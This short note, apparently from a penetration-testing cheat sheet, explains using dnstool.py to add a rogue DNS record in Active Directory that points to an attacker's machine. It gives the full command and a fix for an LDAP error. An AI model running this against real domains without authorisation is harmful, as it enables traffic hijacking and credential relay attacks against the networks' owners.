dnstool.py
This script lets you add DNS records to the domain, which members of Domain Users
can do by default:
Add a rogue DNS record that points to your attacking box
dnstool.py -u 'tangent\any-valid-AD-user' -p 'Supersecretpassword' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER
If you get an error like this:
[!] LDAP operation failed. Message returned from server: noSuchObject 0000208D: NameErr: DSID-0310023C, problem 2001 (NO_OBJECT), data 0, best match of:
'CN=MicrosoftDNS,DC=DomainDnsZones,DC=domain,DC=com'
Then rerun the command with the --legacy flag added.